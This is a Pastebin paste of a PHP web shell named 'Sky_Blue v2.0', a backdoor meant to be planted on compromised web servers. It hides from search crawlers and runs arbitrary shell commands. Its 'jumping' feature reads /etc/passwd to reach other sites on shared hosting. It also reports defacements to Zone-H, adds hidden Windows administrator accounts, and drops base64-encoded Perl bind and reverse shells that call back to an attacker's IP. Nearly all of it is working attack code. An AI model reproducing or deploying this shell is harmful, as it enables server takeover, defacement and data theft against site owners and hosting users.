yonata21

Sky_Blue v2.0

Apr 1st, 2018
499
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 30.19 KB | None | 0 0
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5.  
  6. $auth_pass = "84a94fccf4991338cdb878173be7a245"; // default: ./Infinity21
  7. $color = "#00ff00";
  8. $default_action = 'FilesMan';
  9. $default_use_ajax = true;
  10. $default_charset = 'UTF-8';
  11. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  12.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  13.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  14.         header('HTTP/1.0 404 Not Found');
  15.         exit;
  16.     }
  17. }
  18.  
  19. function login_shell() {
  20. ?>
  21. <html>
  22. <head>
  23. <link href='https://s26.postimg.org/yv1hggwhl/Shade.png' rel='SHORTCUT ICON'/>
  24. <title>2Shell Mr.Uw4X </title>
  25. <style type="text/css">
  26. html {
  27.     margin: 20px auto;
  28.     background: #000000;
  29.     color: blue;
  30.     text-align: center;
  31. }
  32. header {
  33.     color: blue;
  34.     margin: 10px auto;
  35. }
  36. input[type=password] {
  37.     width: 250px;
  38.     height: 25px;
  39.     color: white;
  40.     background: #000000;
  41.     border: 1px solid blue;
  42.     padding: 5px;
  43.     margin-left: 20px;
  44.     text-align: center;
  45. }
  46. .blink {
  47. -webkit-animation-name: blinker;
  48. -webkit-animation-duration: 3s;
  49. -webkit-animation-timing-function: linear;
  50. -webkit-animation-iteration-count: infinite;
  51.  
  52. -moz-animation-name: blinker;
  53. -moz-animation-duration: 2s;
  54. -moz-animation-timing-function: linear;
  55. -moz-animation-iteration-count: infinite;
  56.  
  57.  animation-name: blinker;
  58.  animation-duration: 1s;
  59.  animation-timing-function: linear;
  60.  animation-iteration-count: infinite;
  61. }
  62. @-moz-keyframes blinker {  
  63.  0% { opacity: 1.0; }
  64.  50% { opacity: 0.0; }
  65.  100% { opacity: 1.0; }
  66.  }
  67.  
  68. @-webkit-keyframes blinker {  
  69.  0% { opacity: 1.0; }
  70.  50% { opacity: 0.0; }
  71.  100% { opacity: 1.0; }
  72.  }
  73.  
  74. @keyframes blinker {  
  75.  0% { opacity: 1.0; }
  76.  50% { opacity: 0.0; }
  77.  100% { opacity: 1.0; }
  78.  }
  79. </style>
  80. </head>
  81. <center>
  82. <header>
  83.     <link href='http://fonts.googleapis.com/css?family=Orbitron:700' rel='stylesheet' type='text/css'>
  84.     <font style="color:#000;text-shadow:0px 5px 8px #191970;font-size:90px" face="Orbitron" class="blink">Sky_Blue v2.0</font><br>
  85.     <img src="https://s26.postimg.org/yv1hggwhl/Shade.png" width=24% height=60%>
  86. <form method="post">
  87. <input type="password" name="pass">
  88. </form>
  89. <?php
  90. exit;
  91. }
  92. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  93.     if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  94.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  95.     else
  96.         login_shell();
  97. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  98.     @ob_clean();
  99.     $file = $_GET['file'];
  100.     header('Content-Description: File Transfer');
  101.     header('Content-Type: application/octet-stream');
  102.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  103.     header('Expires: 0');
  104.     header('Cache-Control: must-revalidate');
  105.     header('Pragma: public');
  106.     header('Content-Length: ' . filesize($file));
  107.     readfile($file);
  108.     exit;
  109. }
  110. //password until here
  111. ?>
  112. <?php
  113. if(get_magic_quotes_gpc()){
  114. foreach($_POST as $key=>$value){
  115. $_POST[$key] = stripslashes($value);
  116. }
  117. }
  118. echo '<!DOCTYPE HTML>
  119. <html>
  120. <head>
  121. <link href="https://s26.postimg.org/yv1hggwhl/Shade.png" rel="HORTCUT ICON">
  122. <link href="" rel="stylesheet" type="text/css">
  123. <title>Sky_Blue v2.0</title>
  124. <style>
  125. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  126. @import url(http://fonts.googleapis.com/css?family=Orbitron:700);
  127. body{
  128. font-family: "Ubuntu";
  129. font-size: 13px;
  130. background-color: black;
  131. color:white;
  132. }
  133. #content tr:hover{
  134. background-color: #000;
  135. color: #191970;
  136. text-shadow:4px 4px 10px #0000ff;
  137. }
  138. #content .first{
  139. background-color: #191970;
  140. font-family: "Orbitron";
  141. font-size: 15px;
  142. }
  143. table{
  144. border: 0px #000000 solid;
  145. }
  146. a{
  147. color:white;
  148. text-decoration: none;
  149. }
  150. a:hover{
  151. color:blue;
  152. text-shadow:0px 0px 10px #000070;
  153. }
  154. input{
  155. background: #000;
  156. color: #fff;
  157. -moz-border-radius: 5px;
  158. border-radius:5px;}
  159.  
  160. select,textarea{
  161. border: 1px #191970 solid;
  162. background: #000000;
  163. color: #fff;
  164. -moz-border-radius: 5px;
  165. -webkit-border-radius:5px;
  166. border-radius:5px;
  167. }
  168. </style>
  169. </head>
  170. <body>
  171. <link href="http://fonts.googleapis.com/css?family=Wallpoet" rel="stylesheet" type="text/css">
  172. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">';
  173. echo '<tr>';
  174. //Starting About victim
  175. $kernel = php_uname();
  176. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  177. /*fuction hdd*/
  178. if(!function_exists('posix_getegid')) {
  179.     $user = @get_current_user();
  180.     $uid = @getmyuid();
  181.     $gid = @getmygid();
  182.     $group = "?";
  183. } else {
  184.     $uid = @posix_getpwuid(posix_geteuid());
  185.     $gid = @posix_getgrgid(posix_getegid());
  186.     $user = $uid['name'];
  187.     $uid = $uid['uid'];
  188.     $group = $gid['name'];
  189.     $gid = $gid['gid'];
  190. }
  191. $freespace = hdd(disk_free_space("/"));
  192. /*Code hdd*/
  193. $total = hdd(disk_total_space("/"));
  194. $used = $total - $freespace;
  195. $mysql = (function_exists('mysql_connect')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  196. $curl = (function_exists('curl_version')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  197. $wget = (exe('wget --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  198. $perl = (exe('perl --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  199. $python = (exe('python --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  200. /*code wget python perl*/
  201. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  202. $ds = @ini_get("disable_functions");
  203. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=blue>NONE</font>";
  204. if(!function_exists('posix_getegid')) {
  205.     $user = @get_current_user();
  206.     $uid = @getmyuid();
  207.     $gid = @getmygid();
  208.     $group = "?";
  209. } else {
  210.     $uid = @posix_getpwuid(posix_geteuid());
  211.     $gid = @posix_getgrgid(posix_getegid());
  212.     $user = $uid['name'];
  213.     $uid = $uid['uid'];
  214.     $group = $gid['name'];
  215.     $gid = $gid['gid'];
  216. }
  217. //eksekusi
  218. echo "Name of Shell: <font style='color:#00f;text-shadow:5px 5px 12px #191970;font-size:15px' face='Wallpoet'>Sky_Blue v2.0</font><br>";
  219. echo "System: <font color=blue>".$kernel."</font><br>";
  220. echo "Safe Mode: $sm<br>";
  221. echo "Disable Functions: $show_ds<br>";
  222. echo "Server IP: <font color=blue>".$ip."</font> | Your IP: <font color=blue>".$_SERVER['REMOTE_ADDR']."</font><br>";
  223. echo "Group: <font color=blue>".$group."</font> (".$gid.") User: <font color=blue>".$user."</font> (".$uid.") <br>";
  224. echo "HardDisk: <font color=blue>$used</font> / <font color=blue>$total</font> ( Free: <font color=blue>$freespace</font> )<br>";
  225. echo "MySQL: $mysql | Curl: $curl | Perl: $perl | Python: $python | WGET: $wget ";
  226. //ending about victim
  227.  
  228. //Code Menu
  229. if(isset($_GET['path'])){
  230. $path = $_GET['path'];
  231. }else{
  232. $path = getcwd();
  233. }
  234. $path = str_replace('\\','/',$path);
  235. $paths = explode('/',$path);
  236.  
  237. //starting home bar
  238. echo "<ul><hr width=58% color=blue><center><font style='color:#00f;text-shadow:5px 5px 12px #191970;font-size:15px' face='Wallpoet'>";
  239. echo "[ <a href='?'>Home</a> ] [ <a href='?dir=$path&do=cmd'>Console</a> ] [ <a href='?dir=$path&do=jumping'>Jumping</a> ] [ <a href='?dir=$path&do=krdp_shell'>K-RDP Shell</a> ] [ <a href='?dir=$path&do=zoneh'>Zone-H</a> ] [ <a href='?dir=$path&do=network'>Network</a> ] [ <a style='color: Green;' href='?dir=$path&read=readme'>Readme</a> ] [ <a style='color: red;' href='?logout=true'>Logout</a> ]</center>";
  240. echo "<hr width=58% color=blue><ul></font>";
  241. //fuction menu bar
  242.  
  243. // Readme.md
  244. if($_GET['read'] == 'readme'){
  245.     echo "<font color=white>";
  246.     echo "<center>############## <font size=3><b><u>Sky_Blue v2.0</u></b></font> #############<br><p> Sky_Blue v2.0 is the 2nd version of Private-Mini Shell<br> In this shell there are changes and additions to the feature.</p><br>Special Thanks To: <p><a href=https://www.indoxploit.or.id/>IndoXploit | </a><a href=http://www.75n1.net/>T.I Sniper | </a><a href=http://www.maxteroit.com/>Owl Squad</a></p></font><p><h3>Leave Me Here <br>Please !! :'( </h3></p></center>";
  247. }
  248. // Console
  249. if($_GET['do'] == 'cmd') {
  250.     echo "<form method='post'>
  251.     <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  252.     <input type='text' size='30' height='10' name='cmd'> <input type='submit' name='do_cmd' value='GO'>
  253.     </form>";
  254.     if($_POST['do_cmd']) {
  255.         echo "<pre>".exe($_POST['cmd'])."</pre>";
  256.     }
  257. } elseif($_GET['logout'] == true) {
  258.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  259.     echo "<script>window.location='?';</script>";
  260. }
  261. // jumping
  262. elseif($_GET['do'] == 'jumping') {
  263.     $i = 0;
  264.     echo "<div class='margin: 5px auto;'>";
  265.     if(preg_match("/hsphere/", $path)) {
  266.         $urls = explode("\r\n", $_POST['url']);
  267.         if(isset($_POST['jump'])) {
  268.             echo "<pre>";
  269.             foreach($urls as $url) {
  270.                 $url = str_replace(array("http://","www."), "", strtolower($url));
  271.                 $etc = "/etc/passwd";
  272.                 $f = fopen($etc,"r");
  273.                 while($gets = fgets($f)) {
  274.                     $pecah = explode(":", $gets);
  275.                     $user = $pecah[0];
  276.                     $path_user = "/hsphere/local/home/$user";
  277.                     if(is_dir($path_user) === true) {
  278.                         $url_user = $path_user."/".$url;
  279.                         if(is_readable($url_user)) {
  280.                             $i++;
  281.                             $jrw = "[<font color=blue>R</font>] <a href='?dir=$url_user'><font color=#191970>$url_user</font></a>";
  282.                             if(is_writable($url_user)) {
  283.                                 $jrw = "[<font color=blue>RW</font>] <a href='?dir=$url_user'><font color=#191970>$url_user</font></a>";
  284.                             }
  285.                             echo $jrw."<br>";
  286.                         }
  287.                     }
  288.                 }
  289.             }
  290.         if($i == 0) {
  291.         } else {
  292.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  293.         }
  294.         echo "</pre>";
  295.         } else {
  296.             echo '<center>
  297.                   <form method="post">
  298.                   List Domains: <br>
  299.                   <textarea name="url" style="width: 500px; height: 250px;">';
  300.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  301.             while($getss = fgets($fp)) {
  302.                 echo $getss;
  303.             }
  304.             echo  '</textarea><br>
  305.                   <input type="submit" value="jumping" name="jump" style="width: 500px; height: 25px;">
  306.                   </form></center>';
  307.         }
  308.     } elseif(preg_match("/vhosts|vhost/", $path)) {
  309.         preg_match("/\/var\/www\/(.*?)\//", $path, $vh);
  310.         $urls = explode("\r\n", $_POST['url']);
  311.         if(isset($_POST['jump'])) {
  312.             echo "<pre>";
  313.             foreach($urls as $url) {
  314.                 $url = str_replace("www.", "", $url);
  315.                 $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
  316.                 if(is_dir($web_vh) === true) {
  317.                     if(is_readable($web_vh)) {
  318.                         $i++;
  319.                         $jrw = "[<font color=blue>R</font>] <a href='?dir=$web_vh'><font color=#191970>$web_vh</font></a>";
  320.                         if(is_writable($web_vh)) {
  321.                             $jrw = "[<font color=blue>RW</font>] <a href='?dir=$web_vh'><font color=#191970>$web_vh</font></a>";
  322.                         }
  323.                         echo $jrw."<br>";
  324.                     }
  325.                 }
  326.             }
  327.         if($i == 0) {
  328.         } else {
  329.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  330.         }
  331.         echo "</pre>";
  332.         } else {
  333.             echo '<center>
  334.                   <form method="post">
  335.                   List Domains: <br>
  336.                   <textarea name="url" style="width: 500px; height: 250px;">';
  337.                   bing("ip:$ip");
  338.             echo  '</textarea><br>
  339.                   <input type="submit" value="jumping" name="jump" style="width: 500px; height: 25px;">
  340.                   </form></center>';
  341.         }
  342.     } else {
  343.         echo "<pre>";
  344.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  345.         while($passwd = fgets($etc)) {
  346.             if($passwd == '' || !$etc) {
  347.                 echo "<font color=red>Can't read /etc/passwd</font>";
  348.             } else {
  349.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  350.                 foreach($user_jumping[1] as $user_idx_jump) {
  351.                     $user_jumping_dir = "/home/$user_idx_jump/public_html";
  352.                     if(is_readable($user_jumping_dir)) {
  353.                         $i++;
  354.                         $jrw = "[<font color=blue>R</font>] <a href='?dir=$user_jumping_dir'><font color=#191970>$user_jumping_dir</font></a>";
  355.                         if(is_writable($user_jumping_dir)) {
  356.                             $jrw = "[<font color=blue>RW</font>] <a href='?dir=$user_jumping_dir'><font color=#191970>$user_jumping_dir</font></a>";
  357.                         }
  358.                         echo $jrw;
  359.                         if(function_exists('posix_getpwuid')) {
  360.                             $domain_jump = file_get_contents("/etc/named.conf");   
  361.                             if($domain_jump == '') {
  362.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  363.                             } else {
  364.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  365.                                 foreach($domains_jump[1] as $dj) {
  366.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  367.                                     $user_jumping_url = $user_jumping_url['name'];
  368.                                     if($user_jumping_url == $user_idx_jump) {
  369.                                         echo " => ( <u>$dj</u> )<br>";
  370.                                         break;
  371.                                     }
  372.                                 }
  373.                             }
  374.                         } else {
  375.                             echo "<br>";
  376.                         }
  377.                     }
  378.                 }
  379.             }
  380.         }
  381.         if($i == 0) {
  382.         } else {
  383.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  384.         }
  385.         echo "</pre>";
  386.     }
  387.     echo "</div>";
  388. }
  389. // Zone-H
  390. elseif($_GET['do'] == 'zoneh') {
  391.     if($_POST['submit']) {
  392.         $domain = explode("\r\n", $_POST['url']);
  393.         $nick =  $_POST['nick'];
  394.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  395.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  396.         function zoneh($url,$nick) {
  397.             $ch = curl_init("http://www.zone-h.com/notify/single");
  398.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  399.                   curl_setopt($ch, CURLOPT_POST, true);
  400.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  401.             return curl_exec($ch);
  402.                   curl_close($ch);
  403.         }
  404.         foreach($domain as $url) {
  405.             $zoneh = zoneh($url,$nick);
  406.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  407.                 echo "$url -> <font color=blue>OK</font><br>";
  408.             } else {
  409.                 echo "$url -> <font color=red>ERROR</font><br>";
  410.             }
  411.         }
  412.     } else {
  413.         echo "<center><form method='post'>
  414.         Attacker: <br><br>
  415.         <input type='text' name='nick' size='25' value='Mr.Uw4X'><br><br>
  416.         Domains: <br>
  417.         <textarea style='width: 450px; height: 80px;' name='url'></textarea><br><br>
  418.         <input type='submit' name='submit' value='Archive' style='width: 150px;'>
  419.         </form>";
  420.     }
  421.     echo "</center>";
  422. }
  423. // K-rdp shell
  424. elseif($_GET['do'] == 'krdp_shell') {
  425.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  426.         if($_POST['create']) {
  427.             $user = htmlspecialchars($_POST['user']);
  428.             $pass = htmlspecialchars($_POST['pass']);
  429.             if(preg_match("/$user/", exe("net user"))) {
  430.                 echo "[INFO] -> <font color=red>user <font color=blue>$user</font> sudah ada</font>";
  431.             } else {
  432.                 $add_user   = exe("net user $user $pass /add");
  433.                 $add_groups1 = exe("net localgroup Administrators $user /add");
  434.                 $add_groups2 = exe("net localgroup Administrator $user /add");
  435.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
  436.                 echo "[ RDP ACCOUNT INFO ]<br>
  437.                 ------------------------------<br>
  438.                 IP: <font color=blue>".$ip."</font><br>
  439.                 Username: <font color=blue>$user</font><br>
  440.                 Password: <font color=blue>$pass</font><br>
  441.                 ------------------------------<br><br>
  442.                 [ STATUS ]<br>
  443.                 ------------------------------<br>
  444.                 ";
  445.                 if($add_user) {
  446.                     echo "[add user] -> <font color='blue'>Succesfully</font><br>";
  447.                 } else {
  448.                     echo "[add user] -> <font color='red'>Failed</font><br>";
  449.                 }
  450.                 if($add_groups1) {
  451.                     echo "[add localgroup Administrators] -> <font color='blue'>Succesfully</font><br>";
  452.                 } elseif($add_groups2) {
  453.                     echo "[add localgroup Administrator] -> <font color='blue'>Succesfully</font><br>";
  454.                 } elseif($add_groups3) {
  455.                     echo "[add localgroup Administrateur] -> <font color='blue'>Succesfully</font><br>";
  456.                 } else {
  457.                     echo "[add localgroup] -> <font color='red'>Failed</font><br>";
  458.                 }
  459.                 echo "------------------------------<br>";
  460.             }
  461.         } elseif($_POST['s_opsi']) {
  462.             $user = htmlspecialchars($_POST['r_user']);
  463.             if($_POST['opsi'] == '1') {
  464.                 $cek = exe("net user $user");
  465.                 echo "Checking username <font color=blue>$user</font> ....... ";
  466.                 if(preg_match("/$user/", $cek)) {
  467.                     echo "[ <font color=blue>Already Exist</font> ]<br>
  468.                     ------------------------------<br><br>
  469.                     <pre>$cek</pre>";
  470.                 } else {
  471.                     echo "[ <font color=red>Not Exist</font> ]";
  472.                 }
  473.             } elseif($_POST['opsi'] == '2') {
  474.                 $cek = exe("net user $user uwax");
  475.                 if(preg_match("/$user/", exe("net user"))) {
  476.                     echo "[change password: <font color=blue>uwax</font>] -> ";
  477.                     if($cek) {
  478.                         echo "<font color=blue>Succesfully</font>";
  479.                     } else {
  480.                         echo "<font color=red>Failed</font>";
  481.                     }
  482.                 } else {
  483.                     echo "[INFO] -> <font color=red>user <font color=blue>$user</font> Not Exist</font>";
  484.                 }
  485.             } elseif($_POST['opsi'] == '3') {
  486.                 $cek = exe("net user $user /DELETE");
  487.                 if(preg_match("/$user/", exe("net user"))) {
  488.                     echo "[remove user: <font color=blue>$user</font>] -> ";
  489.                     if($cek) {
  490.                         echo "<font color=blue>Succesfully</font>";
  491.                     } else {
  492.                         echo "<font color=red>Failed</font>";
  493.                     }
  494.                 } else {
  495.                     echo "[INFO] -> <font color=red>user <font color=blue>$user</font> belum ada</font>";
  496.                 }
  497.             } else {
  498.                 //
  499.             }
  500.         } else {
  501.             echo "-- Create RDP --<br>
  502.             <form method='post'>
  503.             <input type='text' name='user' placeholder='username' value='uwax' required>
  504.             <input type='text' name='pass' placeholder='password' value='uwax' required>
  505.             <input type='submit' name='create' value='>>'>
  506.             </form>
  507.             -- Option --<br>
  508.             <form method='post'>
  509.             <input type='text' name='r_user' placeholder='username' required>
  510.             <select name='opsi'>
  511.             <option value='1'>Cek Username</option>
  512.             <option value='2'>Ubah Password</option>
  513.             <option value='3'>Hapus Username</option>
  514.             </select>
  515.             <input type='submit' name='s_opsi' value='>>'>
  516.             </form>
  517.             ";
  518.         }
  519.     } else {
  520.         echo "<font color=red><center>This feature just work in windows server . !!</center></font>";
  521.     }
  522. }
  523. // Network
  524. elseif($_GET['do'] == 'network') {
  525.     echo "<center><form method='post'>
  526.     Bind Port: <br><br>
  527.     Port: <input type='text' placeholder='port' name='port_bind' value='4455'>
  528.     <input type='submit' name='sub_bp' value='GO'>
  529.     </form><br><br>
  530.     <form method='post'>
  531.     Reverse Connection: <br><br>
  532.     Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  533.     Port: <input type='text' placeholder='port' name='port_bc' value='4455'>
  534.     <input type='submit' name='sub_bc' value='GO'>
  535.     </form><br></center>";
  536.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  537.     if(isset($_POST['sub_bp'])) {
  538.         $f_bp = fopen("/tmp/bp.pl", "w");
  539.         fwrite($f_bp, base64_decode($bind_port_p));
  540.         fclose($f_bp);
  541.  
  542.         $port = $_POST['port_bind'];
  543.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  544.         sleep(1);
  545.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  546.         unlink("/tmp/bp.pl");
  547.     }
  548.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  549.     if(isset($_POST['sub_bc'])) {
  550.         $f_bc = fopen("/tmp/bc.pl", "w");
  551.         fwrite($f_bc, base64_decode($bind_connect_p));
  552.         fclose($f_bc);
  553.  
  554.         $ipbc = $_POST['ip_bc'];
  555.         $port = $_POST['port_bc'];
  556.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  557.         sleep(1);
  558.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  559.         unlink("/tmp/bc.pl");
  560.     }
  561. }
  562. //ending home bar
  563. echo '</tr>';
  564. echo '<tr><td><font color="blue">Current Dir :</font> ';
  565.  
  566.  
  567. foreach($paths as $id=>$pat){
  568. if($pat == '' && $id == 0){
  569. $a = true;
  570. echo '<a href="?path=/">/</a>';
  571. continue;
  572. }
  573. if($pat == '') continue;
  574. echo '<a href="?path=';
  575. for($i=0;$i<=$id;$i++){
  576. echo "$paths[$i]";
  577. if($i != $id) echo "/";
  578. }
  579. echo '">'.$pat.'</a>/';
  580. }
  581. echo '</td></tr><tr><td><center>';
  582. if(isset($_FILES['file'])){
  583. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  584. echo '<center><font color="blue">Upload Success</font><br /></center>';
  585. }else{
  586. echo '<center><font color="red">Upload Failed</font><br/></center>';
  587. }
  588. }
  589. echo '<form enctype="multipart/form-data" method="POST">
  590. <font color="white">File Upload :</font> <input type="file" name="file" />
  591. <input type="submit" value="upload" />
  592. </form>
  593. </center></td></tr>';
  594. if(isset($_GET['filesrc'])){
  595. echo "<tr><td>Current File : ";
  596. echo $_GET['filesrc'];
  597. echo '</tr></td></table><br />';
  598. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  599. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  600. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  601. if($_POST['opt'] == 'chmod'){
  602. if(isset($_POST['perm'])){
  603. if(chmod($_POST['path'],$_POST['perm'])){
  604. echo '<font color="blue">Set Permission Success</font><br/>';
  605. }else{
  606. echo '<font color="red">Set Permission Failed</font><br />';
  607. }
  608. }
  609. echo '<form method="POST">
  610. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  611. <input type="hidden" name="path" value="'.$_POST['path'].'">
  612. <input type="hidden" name="opt" value="chmod">
  613. <input type="submit" value="Go" />
  614. </form>';
  615. }elseif($_POST['opt'] == 'rename'){
  616. if(isset($_POST['newname'])){
  617. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  618. echo '<font color="blue">Ganti Nama Success</font><br/>';
  619. }else{
  620. echo '<font color="red">Ganti Nama Failed</font><br />';
  621. }
  622. $_POST['name'] = $_POST['newname'];
  623. }
  624. echo '<form method="POST">
  625. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  626. <input type="hidden" name="path" value="'.$_POST['path'].'">
  627. <input type="hidden" name="opt" value="rename">
  628. <input type="submit" value="Go" />
  629. </form>';
  630. } elseif($_POST['opt'] == 'edit'){
  631. if(isset($_POST['src'])){
  632. $fp = fopen($_POST['path'],'w');
  633. if(fwrite($fp,$_POST['src'])){
  634. echo '<font color="blue">Success Edit File</font><br/>';
  635. }else{
  636. echo '<font color="red">Failed Edit File</font><br/>';
  637. }
  638. fclose($fp);
  639. }
  640. echo '<form method="POST">
  641. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  642. <input type="hidden" name="path" value="'.$_POST['path'].'">
  643. <input type="hidden" name="opt" value="edit">
  644. <input type="submit" value="Save" />
  645. </form>';
  646. }
  647. echo '</center>';
  648. }else{
  649. echo '</table><br/><center>';
  650. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  651. if($_POST['type'] == 'dir'){
  652. if(rmdir($_POST['path'])){
  653. echo '<font color="blue">Directory Delete</font><br/>';
  654. }else{
  655. echo '<font color="red">Directory Failed Deleted                                                                                                                                                                                                                                                                                             </font><br/>';
  656. }
  657. }elseif($_POST['type'] == 'file'){
  658. if(unlink($_POST['path'])){
  659. echo '<font color="blue">File Terhapus</font><br/>';
  660. }else{
  661. echo '<font color="red">File Failed Dihapus</font><br/>';
  662. }
  663. }
  664. }
  665.  
  666. echo '</center>';
  667. echo '<div id="content"><table width="1250" cellpadding="2" cellspacing="1" align="center">
  668. <tr class="first">
  669. <td><center>Name</center></td>
  670. <td><center>Type</center></td>
  671. <td><center>Last Modify</center></td>
  672. <td><center>Owner/Group</center></td>
  673. <td><center>Size</center></td>
  674. <td><center>Permission</center></td>
  675. <td><center>Action</center></td>
  676. <td><center>Backup</center></td>
  677. </tr>';
  678. //For Code Column Directory
  679. $scandir = scandir($path);
  680. foreach($scandir as $dirx){
  681. $dtype = filetype("$path/$dirx");
  682. $dtime = date("F d Y g:i:s", filemtime("$path/$dirx"));
  683. if(function_exists('posix_getpwuid')) {
  684.                     $downer = @posix_getpwuid(fileowner("$path/$dirx"));
  685.                     $downer = $downer['name'];
  686.                 } else {
  687.                     //$downer = $uid;
  688.                     $downer = fileowner("$path/$dirx");
  689.                 }
  690.                 if(function_exists('posix_getgrgid')) {
  691.                     $dgrp = @posix_getgrgid(filegroup("$path/$dirx"));
  692.                     $dgrp = $dgrp['name'];
  693.                 } else {
  694.                     $dgrp = filegroup("$path/$dirx");
  695.                 }
